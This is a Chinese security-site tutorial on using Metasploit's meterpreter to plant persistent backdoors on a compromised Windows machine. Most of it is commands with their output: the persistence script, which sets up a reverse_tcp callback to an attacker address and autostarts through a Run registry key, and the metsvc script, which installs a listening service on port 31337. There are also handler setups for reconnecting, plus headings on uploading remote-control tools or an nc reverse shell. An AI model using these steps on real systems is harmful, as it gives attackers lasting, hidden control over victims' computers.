热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

Metasploit之建立backdoor一二

发布时间:2013-01-24 12:02文章来源:网络文章作者:upload 点击次数:
摘要:1.meterpreter自带脚本 方法1.run presistence 可以使用run presistence -h查看选项: meterpreter run persistence -U -i 5 -p 443 -r 192.168.1.139 [*] Running Persistance Script [*] Resource file for cleanup created at /root/.msf4/logs/persisten...

1.meterpreter自带脚本

方法1.run presistence

可以使用run presistence -h查看选项:

meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139
[*] Running Persistance Script
[*] Resource file for cleanup created at
/root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139

LPORT=443
[*] Persistent agent script is 609496 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
[*] Executing script C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
[+] Agent executed with PID 3272
[*] Installing into autorun as HKCU\Software\Microsoft\Windows
\CurrentVersion\Run\FCBCUBtLrzFY
[+] Installed into autorun as HKCU\Software\Microsoft\Windows

\CurrentVersion\Run\FCBCUBtLrzFY

可以看到添加启动是通过,添加注册表键值,启动的是vbs脚本的后门。

连接:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf exploit(handler) > set LHOST 192.168.1.139
LHOST => 192.168.1.139
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...

默认没启动,目标机重启后,可以成功获得meterpreter shell

方法2.run metsvc

执行metsvc 脚本

meterpreter > run metsvc -A
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP

\kqaqtcsWhBTbO...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.

[*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...

新建的服务,加自启动(映像名称metsvc.exe,服务metsvc ),连接到后门:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 192.168.1.108
RHOST => 192.168.1.108
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...

meterpreter >

成功连接

2.自定义后门

方法1.上传远控

方法2.上传nc或其他反弹shell

BT5创建NC反弹型后门

标签分类:

上一篇:Hash直接登录Windows]简单分析
下一篇:RDP包批量解析为用户名+密码的php脚本